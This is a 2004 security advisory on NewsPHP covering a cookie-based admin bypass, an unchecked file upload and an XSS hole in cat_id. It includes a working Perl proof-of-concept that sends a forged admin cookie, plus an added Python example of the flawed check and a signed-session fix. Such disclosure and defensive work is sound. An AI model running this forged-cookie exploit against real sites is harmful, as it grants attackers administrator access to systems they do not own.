[UNIX] Multiple Vulnerabilities in NewsPHP (Admin Privileges, File Upload, XSS)
From: SecuriTeam (support_at_securiteam.com)
Date: 04/14/04
To: list@securiteam.com Date: 14 Apr 2004 09:20:35 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Multiple Vulnerabilities in NewsPHP (Admin Privileges, File Upload, XSS)
------------------------------------------------------------------------
SUMMARY
"NewsPHP <http://www.newsphp.com/> is a perfect solution for creating a web
publishing system, like an online magazine, newspaper, TV/Radio or news
portals. It works also as a Content Management System that is easy to
install and manage without having to FTP upload your pages every time you
need to update it". Several vulnerabilities in NewsPHP allow a remote
attacker to gain administrator rights on NewsPHP, run arbitrary code and
perform XSS attacks.
DETAILS
Cookie Vulnerability:
This flaw is caused by an improper check of administrator rights, which
are read from the cookie's data.
File Upload vulnerability:
Due to improper sanity checks a privileged user can upload executable code
instead of a video in the Administration Panel.
Cross-Site Scripting:
A remote user can conduct a cross-site scripting attack due to an input
validation flaw in the handling of the cat_id variable.
Example:
http://vulnerablehost/index.php?cat_id=[XSS code]
Vendor Status:
Vendor was contacted on Apr 3 2004
Proof of Concept:
The following is a proof of concept code for the cookie vulnerability:
#!/usr/bin/perl -w
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm
use IO::Socket;

# Print usage and exit unless host, directory and output file are given.
if (@ARGV < 3)
{
    print "\n\n";
    print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
    print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
    print "By: Manuel Lopez mantra at gulo.org\n";
    print "\n\n";
    exit(1);
}

$host = $ARGV[0];
$directorio = $ARGV[1];   # directory where NewsPHP is installed
$fichero = $ARGV[2];      # file that receives the server's response

print "\n";
print "----- Connecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
    PeerPort => "80") || die "\$socket error $!";
print "====> Connected\n";
print "====> Sending Data .. \n";
# The request carries the cookie values the application accepts as proof
# of administrator rights; the empty line ends the HTTP headers.
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.0
Cookie: autorized=admin; root=admin

fin
print "====> OK\n";
print "====> Generating $fichero ...\n";
# Save the response so the returned page can be inspected.
open( Result, ">$fichero") or die "open $fichero: $!";
print Result while <$socket>;
close Result;
##--------------------------
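The failure behind the cookie vulnerability, and one way to close it, as an added example that is not part of the original advisory or of NewsPHP's code. The naive check is an assumed reconstruction based on the cookie header in the proof of concept; the function names, the "session" cookie and the key are hypothetical.

```python
import hashlib
import hmac
import secrets

# Constructed sample: the Cookie header sent by the proof of concept above.
POC_COOKIE = "autorized=admin; root=admin"


def parse(cookie_header):
    """Split a Cookie request header into a {name: value} dict."""
    pairs = (p.strip().partition("=") for p in cookie_header.split(";"))
    return {name: value for name, _, value in pairs if name}


def is_admin_naive(cookie_header):
    # Assumed shape of the flawed check: the client states its own role.
    c = parse(cookie_header)
    return c.get("autorized") == "admin" and c.get("root") == "admin"


def issue_session(user, role, key):
    """After a successful login, bind user and role with an HMAC tag."""
    payload = f"{user}|{role}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"session={payload}|{tag}"


def is_admin_signed(cookie_header, key):
    """Grant admin only if the tag verifies and the signed role is admin."""
    token = parse(cookie_header).get("session", "")
    payload, _, tag = token.rpartition("|")
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return False
    return payload.rpartition("|")[2] == "admin"


if __name__ == "__main__":
    key = secrets.token_bytes(32)  # server-side secret, never sent to clients
    forged = issue_session("bob", "user", key).replace("|user|", "|admin|")
    for label, header in [("PoC cookie", POC_COOKIE),
                          ("admin login", issue_session("alice", "admin", key)),
                          ("edited role", forged)]:
        print(label, is_admin_naive(header), is_admin_signed(header, key))
```

A server-side session store keyed by a random identifier achieves the same goal; either way the role must come from state the client cannot edit.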
ADDITIONAL INFORMATION
The information has been provided by Manuel Lopez
<mailto:mantra@gulo.org>.